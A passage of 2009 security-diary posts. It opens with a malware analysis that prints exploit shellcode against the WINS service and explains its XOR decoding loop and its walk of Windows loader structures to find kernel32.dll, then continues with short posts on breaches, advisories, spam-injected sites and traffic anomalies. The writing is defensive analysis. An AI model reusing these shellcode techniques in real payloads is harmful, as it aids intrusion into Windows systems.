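 * the entire basis of the malware's cheap "encryption." */
uint8_t xor_roundtrip(uint8_t x, uint8_t key)
{
    return (uint8_t)((x ^ key) ^ key);
}
```

Try it with any byte and any key: the round trip always hands you back the original value.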

Having cleared out the ECX register, the code then loads it up with 0x177 (that's 375 in decimal...) and then proceeds to use that value plus the "bookmark" location it stole off the stack (in EDX) as the offset at which to begin XORing memory values with 0x99 (153 decimal).

What the heck?

Remember when I said that XOR could be used as cheap and dirty "encryption"?  Well, that's exactly what they've done here.  They've "encrypted" their code (using 0x99 as their "key" -- nothing special about it, any number will do) and now they're decrypting it.  The "LOOP" operation in the following step decreases the value in ECX by one-- and then, if ECX isn't yet zero, it loops back to 0x462, otherwise, it continues on.  This will result in "decrypting" 375 bytes of code.

Let's see what we find in that code...

Key to the City

"But Tom," I hear you cry, "the code is encrypted!  How will you ever be able to look at it?"  Putting aside, for the moment, our recent discussion on "familiarity," I'll explain that, while the code is "encrypted," it's not really trying hard enough to keep me (or anyone else for that matter) out.  The reason that malware authors XOR "encrypt" their stuff is to keep IDS systems from easily recognizing specific code signatures as they fly by.  I already have the "key," it was sitting right out there in the open before... 0x99.  So all I need to do is to write myself a short program that will use that "key" to "unlock" the real, unencrypted code. And so, 4.5 minutes (I timed it...) of C coding, compiling, fixing a damned missing semicolon (why, if the compiler is smart enough to tell me EXACTLY where the missing semicolon goes, doesn't it just PUT it there for me?), and compiling again, and I have some newly "decrypted" code in front of me.
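I won't reproduce my throwaway program here, but the whole idea fits in a few lines.  Here's a hedged sketch (the function name is mine) of a decoder doing the same single-byte XOR the shellcode's own loop does-- in the actual attack, key 0x99 over 0x177 bytes:

```c
#include <stddef.h>
#include <stdint.h>

/* XOR `len` bytes in place with a one-byte key.  Because XOR is its
 * own inverse, the exact same routine both "encrypts" and decrypts. */
void xor_decode(uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}
```

Run it once over the captured bytes with key 0x99 and the "encrypted" shellcode falls right open; run it a second time and you're back where you started.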

Let's see here...

0000046F                 push    esp
00000470                 mov     ebp, esp
00000472                 sub     esp, 28h
00000475                 mov     esi, esp
00000477                 call    sub_575

The code starts off by pushing the value of the stack pointer (a register that holds the memory location of the top "plate" in the stack) onto the stack.  It then copies it to another register (EBP), and then subtracts 0x28 (40 decimal) from the value and saves that to another register (ESI) as well.  Why?  Well, the malicious code is creating its own new chunk o' stack space where it can do its work without disturbing the real stack... Hopefully, before everything is said and done, it'll put everything back in place so that the WINS service will be able to carry on about its business as though nothing untoward had happened.  After doing all of that, it then calls another subroutine.

00000575 sub_575         proc near     
00000575                 push    ebp
00000576                 push    esi
00000577                 mov     eax, fs:30h
0000057D                 mov     eax, [eax+0Ch]
00000580                 mov     esi, [eax+1Ch]
00000583                 lodsd
00000584                 mov     ebp, [eax+8]
00000587                 mov     eax, ebp
00000589                 pop     esi
0000058A                 pop     ebp
0000058B                 retn    4
0000058B sub_575         endp

Holy crud! What the heck is that?

Well that, my dear reader, is the means by which the malcode finds some much-needed information.  Let's walk through it... To begin with, whenever you start a subroutine, before you screw up the contents of any of the registers you might need later, you always want to save the information that's in them. Later, as you exit the subroutine, you can put things back in place.  To that end, you'll notice that the code pushes some values onto the stack at the beginning of the subroutine and then pops them off (in the opposite order... remember LIFO!) at the end.  Having done that, we then see a really funky looking instruction: mov eax, fs:30h.  To understand what's happening here, you need to understand a little bit about something called the Windows Process Environment Block (PEB).  


The Process Environment Block is a memory-based data structure that contains all sorts of interesting user-writable information on the running process.  For you programming-types out there, here is the structure of the PEB:

typedef struct _PEB {
BOOLEAN InheritedAddressSpace;  //0x00
BOOLEAN ReadImageFileExecOptions;  //0x01
BOOLEAN BeingDebugged;  //0x02
BOOLEAN Spare;   //0x03
HANDLE Mutant;   //0x04
PVOID ImageBaseAddress; //0x08
PPEB_LDR_DATA LoaderData; //0x0C
PVOID SubSystemData;
PVOID ProcessHeap;
PVOID FastPebLock;
ULONG EnvironmentUpdateCount;
PPVOID KernelCallbackTable;
PVOID EventLogSection;
PVOID EventLog;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[0x2];
PVOID ReadOnlySharedMemoryBase;
PVOID ReadOnlySharedMemoryHeap;
PPVOID ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
BYTE Spare2[0x4];
LARGE_INTEGER CriticalSectionTimeout;
ULONG HeapSegmentReserve;
ULONG HeapSegmentCommit;
ULONG HeapDeCommitTotalFreeThreshold;
ULONG HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PPVOID *ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
PVOID GdiDCAttributeList;
PVOID LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
ULONG OSBuildNumber;
ULONG OSPlatformId;
ULONG ImageSubSystem;
ULONG ImageSubSystemMajorVersion;
ULONG ImageSubSystemMinorVersion;
ULONG GdiHandleBuffer[0x22];
ULONG PostProcessInitRoutine;
ULONG TlsExpansionBitmap;
BYTE TlsExpansionBitmapBits[0x80];
ULONG SessionId;
} PEB, *PPEB;

Notice that the PEB contains all sorts of information that might be of use to a chunk of code that just found itself being executed inside of a process on a machine and in an environment that it knows little to nothing about (hey... lookie there: OSMajorVersion, OSMinorVersion, OSBuildNumber, OSPlatformID...).  The address of the PEB itself can always be found on Windows (>=NT) by loading it from fs:30h (why that's so is beyond the scope of this article... but trust me...). So, once we've loaded up the location of the PEB, we see that the code is looking at a particular location offset into the PEB itself-- in fact, it's looking at a location 0x0C (12 decimal) from the beginning of the PEB structure. The offset from the beginning of the structure is referenced above, so we can see that offset 0x0C is a pointer to something called "LoaderData," which is itself, another in-memory data structure.

The LoaderData structure looks like this:

typedef struct _PEB_LDR_DATA {
ULONG Length; //0x00
BOOLEAN Initialized; //0x04
PVOID SsHandle; //0x08
LIST_ENTRY InLoadOrderModuleList; //0x0C
LIST_ENTRY InMemoryOrderModuleList; //0x14
LIST_ENTRY InInitializationOrderModuleList; //0x1C
} PEB_LDR_DATA, *PPEB_LDR_DATA;

Steppin' on along, we see that what we're really looking for is again, something offset into this particular structure... actually something at offset 0x1C (28 decimal) (Note: I'm getting these offsets by looking at what is being added to EAX at each step).  Those LIST_ENTRIES actually contain two memory pointers, and make up what is known as a doubly linked list-- the first pointer is to the "previous" module and the second to the "next" module. So the 28 byte offset points us to the LIST_ENTRY for the "InInitializationOrderModuleList."  Each entry in that list points to the InInitializationOrderModuleList entry in a listing of these structures:

typedef struct _LDR_MODULE {
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID BaseAddress;
PVOID EntryPoint;
ULONG SizeOfImage;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;

and this linked list strings together all of the information for the modules (.DLL files) in their initialization order.  The first module initialized for ANY Windows program is... kernel32.dll. The LODSD instruction then loads the value pointed to by ESI into EAX..., and we then bump that by 8 bytes to point to the "BaseAddress" entry...

So, what do all of these machinations accomplish?  Well, when you're an evil piece o' malware, and you would like to use any of the nice functions provided to you by the operating system under Windows, you've got a problem.  Normally, when a piece of software loads and runs under Windows, the Windows Loader takes care of things like loading DLLs and fixing up the program's import table so that the functions that you use from kernel32.dll or user32.dll, etc... all just automatically work.  For evil malware exploiting a vulnerability to run itself as part of a vulnerable process, such niceties aren't available... worse still, you don't really even have a way to find something like GetProcAddress so you can load up imports yourself.  What we have here is a nifty way to find the BaseAddress of kernel32.dll... and that's exactly what's in EAX when this subroutine returns.

Another way of looking at this is that, in the code we're looking at, the PEB chains us to the LoaderData, and the LoaderData chains us to module information, which chains us to the BaseAddress of kernel32.dll...  Now the malware needs to move from knowing the BaseAddress of kernel32.dll to being able to call the functions that it needs to make Joe's life miserable...
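To make that pointer chase concrete, here's a toy, user-land model in C.  These are deliberately simplified mock structures (NOT the real Windows layouts-- those are the definitions listed earlier); they exist only to show the shape of the chain: PEB to LoaderData to the module list to a module's BaseAddress.

```c
#include <stddef.h>

/* Mock, simplified structures-- NOT the real Windows layouts. */
typedef struct ListEntry { struct ListEntry *Flink; } ListEntry;

typedef struct {
    ListEntry InInitializationOrderModuleList; /* embedded list entry */
    void     *BaseAddress;                     /* what the shellcode wants */
} LdrModule;

typedef struct { ListEntry InInitializationOrderModuleList; } PebLdrData;
typedef struct { PebLdrData *LoaderData; } Peb;

/* Follow the chain the way the shellcode does: PEB -> LoaderData ->
 * first list entry -> back up to the containing module -> BaseAddress. */
void *find_base_address(const Peb *peb)
{
    ListEntry *entry = peb->LoaderData->InInitializationOrderModuleList.Flink;
    LdrModule *mod = (LdrModule *)((char *)entry
                     - offsetof(LdrModule, InInitializationOrderModuleList));
    return mod->BaseAddress;
}
```

The "back up to the containing module" step is the same trick the shellcode pulls with its fixed byte offsets: a LIST_ENTRY points into the middle of an LDR_MODULE, and simple pointer arithmetic recovers the fields around it.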

So, at this point, our evil code has managed to insinuate itself into our running process (the WINS service) and has found the BaseAddress of the kernel32.dll file... and... well, 'splainin' all of this has pretty much worn me out...

So, how about if we both take a break and take this up again in the next installment?

And, because I absolutely love getting a bunch of you to write in and annoy the next Handler on Duty (hi Deb!), I've been dropping some hints pointing towards a particular person throughout my ramblings... anyone know who that is?

Tom Liston - InGuardians - Handler on Duty
Follow me on Twitter

P.S.: For Adrien- Oompah Loompahs!


Published: 2009-05-05

Health database breached

The wikileaks.org web site, which is a pretty famous repository of "leaked" documents that were never supposed to see the light of day, is reporting on a supposedly large security breach of the Virginia Prescription Monitoring Program (VPMP). According to the web site and other sources around the web, the VPMP web site was defaced by an unknown hacker who left a ransom note asking for US$10 million in order to return the data.

According to the hacker, he acquired records on more than 8 million patients. The records include prescription data as well as patients' names, ages, addresses, SSNs, and driver's license numbers.

Now, while none of this has been verified, there are a couple of things we can already see. First of all, the hacker definitely managed to compromise the web site, because the front-end web page was modified. According to the message left by the hacker, he also deleted the backups (now, this raises some eyebrows, doesn't it?).

If this is all correct, it indicates that several protection layers failed at the VPMP. Without knowing more details we can't say whether the web application was good or bad (maybe the hacker got access through a different vulnerability), but one thing that should never happen is for a hacker to be able to delete your backups. Indeed, any decent backup system will only allow you to back up the data or read it – only the backup administrator should be able to delete the backups.

We'll see how things develop and will update the diary if we get more information.


Published: 2009-05-05

New version (v 1.4.2) of BASE available

While there isn't a writeup in the site's "news" section, I've confirmed with fellow InGuardian and BASE project-lead, Kevin Johnson, that there is indeed a new version (v 1.4.2) of BASE available.  If you're not familiar with it, BASE is a web interface to perform analysis of network intrusion data gathered by Snort.  You can download the latest version here.

Tom Liston - InGuardians - ISC Handler


Published: 2009-05-05

Every dot matters

A couple of days ago, one of our readers, Lee Dickey, reported strange behavior of a link on Microsoft's TechNet web page with information about SP2 for Vista. At first look, it appeared that a web page hosted by Microsoft had been compromised, as it redirected the browser to an external web site that was simply some kind of a search engine.

A screenshot of the page is shown below; can you spot the error?


That's right – a dot is missing between technet and microsoft.com, so the link actually pointed to technetmicrosoft.com, a domain registered by someone in the USA, as is easily checked with WHOIS.

So what happened here? Nothing malicious – it was simply a typo by someone at Microsoft. However, what should be stressed is the importance of link validation – if the owner of the technetmicrosoft.com domain were malicious, he could have done some serious damage. Luckily, Lee notified Microsoft as well and this was fixed quickly.



Published: 2009-05-04

Adobe Reader/Acrobat Critical Vulnerability

A critical vulnerability has been discovered in the JavaScript handling within Adobe Reader and Acrobat versions 9.1 and earlier.  According to the announcement, Adobe expects to make available Windows updates for Adobe Reader versions 9.X, 8.X, and 7.X and Acrobat versions 9.X, 8.X, and 7.X, Macintosh updates for Adobe Reader versions 9.X and 8.X and Acrobat versions 9.X and 8.X, as well as Adobe Reader for Unix versions 9.X and 8.X, by May 12th, 2009.  Additionally, there is a second vulnerability specific to Adobe Reader for Unix that will be resolved by this update as well.

In the meantime, you can perform mitigation steps by disabling JavaScript in Reader and Acrobat:

  1. Launch Acrobat or Adobe Reader.
  2. Select Edit>Preferences
  3. Select the JavaScript Category
  4. Uncheck the ‘Enable Acrobat JavaScript’ option
  5. Click OK


Remember back when we used to tell people to use PDF documents because they were safer than dealing with MS Office?

(Thanks to "roseman" for the tip...)

Tom Liston - InGuardians - Handler on Duty


Published: 2009-05-04

Putting the ED _back_ in .EDU

The Internet is a wonderful thing.  Think of all the ways it has changed how we do things. Over the weekend, I needed to find some information on a particularly nasty weed we had growing in our woods.  Back in the day, it would have entailed a trip to the local library and a pretty good possibility of not finding anything at all.  Now, all I need is a little bit of Google-Fu, and I was able to find a web page with way more information on this plant than I ever wanted.

There are web pages out there for EVERYTHING (thus Rule #34), and at this point, pretty much anyone can stand up a website.  Take a course or two at the community college, shell out a few bucks for an "HTML for Dummies" book, and heck, you're a "web designer."

Therein lies the problem.

Knowing how to "design" a page o' dancing gerbils does not a secure site make. (<-- Note: while grammatically correct, like Yoda do I sound...) Once you've mastered the fine art of the <blink> tag, you need to actually check your site to make sure that one of the evil denizens of the 'net hasn't altered your masterpiece.

In the brilliant precursor to this sequel, I tried to point out a little bit o' Google-dorking that found some really interesting things on the sites of various institutions of higher learning.  This time around, I'll throw some .gov sites under the bus as well.

Try tossing the following query at big-G: "site:.edu filetype:html buy viagra"

Last time I did this, I didn't name names... but I'm older and more curmudgeonly now, so here is a cross-section of some of the .edu sites that made the "little blue pill" hit parade:

  • The Division of Social Sciences at UC Santa Cruz
  • The Space Systems Simulation Laboratory at Virginia Tech
  • Indiana University-Purdue University Fort Wayne
  • The University of Tennessee - Knoxville
  • The Biology Department (how fitting!) at the University of Central Florida
  • The University of Khartoum (ev1l h@x0rs don't just whack universities in the U.S.)
  • The Northern Marianas College (see...)
  • etc..., etc..., etc...

What's kinda' cool is that since Google takes some time to "forget," you can also see the folks who WERE whacked for long enough to get spidered by the Google bot, but have since cleaned things up.

And let's not forget our fine government.  Nothing makes a taxpayer more proud than to know that their government websites are flogging fixes for flagging phalluses (ain't the alliteration sweet?).  Head back to Google and search for: "site:.gov filetype:html order viagra online"

Let's see... who do we have here?

  • The City of Ingleside, Texas (and they say Virginia is for lovers...)
  • The Oklahoma House of Representatives (still not Virginia...)
  • Yadkin County, North Carolina (oh... really, REALLY close...)
  • The New Hampshire Police Standards & Training Council (hehehehe...)

So, if any of you happen to have some free time on your hands, give those Google queries a shot.  Play around with different combinations of words and different combinations of search constraints. Drop a nice, polite note to the folks in charge of the compromised sites and point out the issues... but don't be surprised if they get a bit ticked off at you: there is a long, time-honored tradition in the IT world of blaming the messenger...

So what's the deal here?  While I haven't had (and don't have) the time to do an in-depth investigation, my guess would be that these are the result of having a Content Management System (CMS) get "managed" by someone else, either through a weak password or through a vulnerability in the CMS itself (these things are notoriously buggy...).  Generally these "additions" are housed in a <span> marked with "visibility:hidden," and so a cursory glance at the site shows nothing amiss.  If no one bothers to look at the actual code of the page, the altered pages can hang around forever-- making your university, unit of government, or business look pretty darned silly.
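If you'd like to check your own pages for this kind of "addition," a few lines of scripting will do. Here's a minimal sketch that hunts for hidden spans containing pharma keywords; the keyword list and the sample page are illustrative, and a real check would fetch your live pages rather than a hard-coded string:

```python
import re

# Illustrative spam keyword list -- extend to taste.
SPAM_WORDS = ("viagra", "cialis", "pharmacy")

# Matches <span ... visibility:hidden ...> ... </span> (non-nested spans).
HIDDEN_SPAN = re.compile(
    r'<span[^>]*visibility\s*:\s*hidden[^>]*>(.*?)</span>',
    re.IGNORECASE | re.DOTALL,
)

def find_hidden_spam(html):
    """Return the contents of hidden spans that mention a spam keyword."""
    hits = []
    for content in HIDDEN_SPAN.findall(html):
        if any(word in content.lower() for word in SPAM_WORDS):
            hits.append(content.strip())
    return hits

# Example: a page defaced the way described above.
page = ('<html><body>Welcome!'
        '<span style="visibility:hidden">buy viagra online</span>'
        '</body></html>')
print(find_hidden_spam(page))
```

Running it against the sample page flags the hidden "buy viagra online" span that a casual glance at the rendered site would never show.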


Tom Liston - InGuardians, Inc. -Handler on Duty


Published: 2009-05-04

Facebook phishing malware

Looks like there may be a piece of malware out there that is sending messages to folks on Facebook, trying to trick them into visiting a facsimile "Facebook" login page to steal credentials.  The phishing site is currently on "junglemix.in," so you may want to block that site.  More details as we figure this thing out. (Thanks to Kent for the heads up!)


Published: 2009-05-02

More Swine/Mexican/H1N1 related domains

Just a reminder to be ever vigilant in your browsing for Swine/Mexican/H1N1 flu information.  We show over 1000 new domains containing those keywords registered in the last 24 hours.
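If you track new domain registrations yourself, a crude keyword filter will surface names like these. A minimal sketch follows; the domain list is a made-up sample standing in for whatever zone-file diff or registration feed you have access to:

```python
# Hypothetical sample of newly registered domains; in practice this list
# would come from a zone-file diff or a domain registration feed.
new_domains = [
    "swine-flu-cure-now.com",
    "example.org",
    "h1n1-vaccine-cheap.net",
    "mexicanflu-news.info",
    "shop.example.com",
]

# Keywords to flag -- adjust for whatever the scare of the day is.
KEYWORDS = ("swine", "h1n1", "mexicanflu", "flu")

suspicious = [d for d in new_domains if any(k in d.lower() for k in KEYWORDS)]
print(suspicious)
```

Nothing fancy, but run daily against a registration feed it gives you a quick watch list of domains trading on the outbreak.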


-- Rick Wanner - rwanner at isc dot sans dot org


Published: 2009-05-02

Decrease in Conficker P2P?

Seems to be my day to ask for assistance...

One of our regular contributors has been tracking Conficker-related P2P traffic for the last several weeks.  Oddly, from their point of view the traffic dropped off to near nothing around 8 PM GMT on April 30th.

We have not heard of any change in Conficker behavior from any of the usual Conficker sources.  If any of you noticed any Conficker related changes in the last few days we would love to hear from you.


-- Rick Wanner rwanner at isc dot sans dot org


Published: 2009-05-02

Significant increase in port 2967 traffic

Today one of our Handlers noticed an interesting anomaly in the DShield data. Since late March DShield has seen a significant increase in the number of sources using port 2967 for scanning.  Traditionally there has been some activity on this port, but in late March the number of sources increased roughly sixfold and the number of targets increased by about 50%. After a few days the sources settled down to about double the traditional value.


Most likely this has something to do with the recent Symantec vulnerabilities, but we here at the ISC would be interested in any insight anybody can offer on this activity.  We would be especially interested in packet captures of traffic of this nature.

 If you have any information that may help, please contact us.
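If you want to check your own perimeter logs for this pattern, counting unique sources hitting port 2967 is a few lines of work. The sketch below assumes an iptables-style log line; the sample lines and the regex are illustrative, so adapt them to whatever your firewall actually emits:

```python
import re
from collections import Counter

# Illustrative iptables-style log lines; substitute your own log file.
log_lines = [
    "May  2 10:01:12 fw kernel: IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP DPT=2967",
    "May  2 10:01:15 fw kernel: IN=eth0 SRC=203.0.113.5 DST=192.0.2.11 PROTO=TCP DPT=2967",
    "May  2 10:02:30 fw kernel: IN=eth0 SRC=198.51.100.7 DST=192.0.2.10 PROTO=TCP DPT=2967",
    "May  2 10:03:01 fw kernel: IN=eth0 SRC=198.51.100.9 DST=192.0.2.12 PROTO=TCP DPT=80",
]

line_re = re.compile(r"SRC=(\S+).*DPT=(\d+)")

# Tally hits per source address, keeping only destination port 2967.
hits = Counter()
for line in log_lines:
    m = line_re.search(line)
    if m and m.group(2) == "2967":
        hits[m.group(1)] += 1

print("unique sources:", len(hits))
for src, count in hits.most_common():
    print(src, count)
```

Graph the unique-source count per day and you should be able to see for yourself whether the late-March jump shows up in your own data.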

-- Rick Wanner rwanner at isc dot sans dot org


Published: 2009-05-01

Password != secure

While reading a story on how an attacker broke into the administrative interface to Twitter, I came across the following quote: "One of the admins has a yahoo account, i've reset the password by answering to the secret question. Then, in the mailbox, i have found her twitter password." Social engineering and good guessing trump security every time. Twitter has confirmed the intrusion; sad but true. No hacking necessary. I could probably rant for hours on the subject, but most of you know the story. Enough said.

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-01

Incident Management

Continuing the discussion started here regarding Incident Response and Incident Handling, let's now introduce Incident Management. One of the issues we face in IT security is that we do not always use a common set of definitions or terminologies, so I find it helpful to explain what I mean when I say Incident Management, since my meaning may differ from what others understand. Looking at a couple of industry definitions, we can see that they differ somewhat but have common themes.

From ITIL: The objective of Incident Management is to restore normal operations as quickly as possible with the least possible impact on either the business or the user, at a cost-effective price.

From SEI: An incident management capability is instantiated in a set of services considered essential to protecting, defending, and sustaining an organization’s computing environment, in addition to conducting appropriate response actions.

From ISO/IEC 27002: Information security incident management - anticipating and responding appropriately to information security breaches.

From US-CERT: An incident management capability is the ability to provide management of computer security events and incidents. It implies end-to-end management for controlling or directing how security events and incidents should be handled. This involves defining a process to follow with supporting policies and procedures in place, assigning roles and responsibilities, having appropriate equipment, infrastructure, tools, and supporting materials ready, and having qualified staff identified and trained to perform the work in a consistent, high-quality, and repeatable way.

The definitions I work from are as follows:

Incident Response is all of the technical components required in order to identify, analyze, and contain an incident.

Incident Handling is the logistics, communications, coordination, and planning functions needed in order to resolve an incident in a calm and efficient manner.

One definition is more tactical, the other operational. Response focuses on the immediate needs of the incident at hand; Handling on the broader capabilities of an organization to prepare for an incident.

Incident Management is the framework and set of functions required to enable Incident Response and Incident Handling within an organization.

Information Security Incident Management (IM) is not composed of a single process, but rather includes a number of operational and technical components which provide the necessary functions to support the traditional “Preparation, Identification, Containment, Eradication, Recovery, Lessons Learned” incident process model, including longer term monitoring, strategic planning, and trend analysis.

I helped develop an Incident Management Maturity Model (IM-MM) which included the following domains:

  • Threat Environment Monitoring
  • Security Incident Monitoring
  • Vulnerability Management
  • Configuration Management
  • Log Management
  • Forensics
  • Incident Handling
  • Co-ordination/Centralization
  • Knowledge Management

People, policy, processes, and technology in each of these domains are required to varying degrees for an organizational Incident Management capability to function correctly. Each can also be evaluated for an assessment of the organization's overall capability to resolve incidents. 

Adrien de Beaupré, yes I do hold the GCIH certification, analyst #69. And yes, I have worked in Incident Response, Incident Handling, and Incident Management for quite some time. 

Adrien de Beaupré
Intru-shun.ca Inc.

The IM-MM has been released under a Creative Commons license but not yet published; I am working on that now. Disclaimer: I am not an employee of SANS or GIAC, and I do not represent them. My opinions are my own and not my employer's nor anyone else's. And yes, I am Canadian, eh!


Published: 2009-05-01

OpenBSD 4.5

OpenBSD 4.5 has been released. There are a few security and reliability fixes, including OpenSSH 5.2.


Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-01

Adobe Flash Media Server privilege escalation security bulletin

From their web site: A potential vulnerability has been identified in Flash Media Server 3.5.1 and earlier that could allow an attacker to execute remote procedures in Flash Media Interactive Server or Flash Media Streaming Server. Adobe recommends users update to the most current version of Flash Media Server (3.5.2 or 3.0.4 or greater).

Updates available to address Flash Media Server privilege escalation issue

Adrien de Beaupré
Intru-shun.ca Inc.


Published: 2009-05-01

Odd packets

No.           Time             Source                 Destination         Protocol Info
107496   10.768466         UDP Source port: 43152  Destination port: http

Frame 107496 (118 bytes on wire, 118 bytes captured)
Ethernet II, Src: Cisco (MACSRC), Dst: Cisco (MACDST)
Internet Protocol, Src: my-net (, Dst: apnic (
User Datagram Protocol, Src Port: 43152 (43152), Dst Port: http (80)
Data (76 bytes)
0030  01 00 8f f9 08 00 61 62 63 64 65 66 67 68 69 6a   ......abcdefghij
0040  6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 61 62 63   klmnopqrstuvwabc
0050  64 65 66 67 68 69 00 00 00 00 00 00 00 00 00 00   defghi..........
0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0070  00 00 00 00 00 00   

A few things to note: these are UDP packets from a high source port to port 80. They are coming from 'our' network and going to a system in APNIC space. There are a significant number of them.
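For what it's worth, the data portion decodes easily with a few lines of Python. Stripping the trailing nulls leaves a 32-byte repeating-alphabet pattern (coincidentally the same "abcdefghijklmnopqrstuvwabcdefghi" payload the Windows ping utility uses); treating the leading six bytes as a header is purely a guess on my part:

```python
# Hex bytes as shown in the dump above (offsets 0x30 through 0x75).
hex_dump = (
    "01 00 8f f9 08 00 61 62 63 64 65 66 67 68 69 6a "
    "6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 61 62 63 "
    "64 65 66 67 68 69 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00"
)

data = bytes.fromhex(hex_dump.replace(" ", ""))

# Split off the first six bytes (possibly a header -- that is a guess)
# and strip the null padding from the rest.
header, payload = data[:6], data[6:]
print("header :", header.hex())
print("payload:", payload.rstrip(b"\x00").decode("ascii"))
```

Whether that alphabet pattern means the traffic is repurposed echo-style test data or something else entirely, I can't say.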

Any ideas? Let us know.     

Adrien de Beaupré
Intru-shun.ca Inc.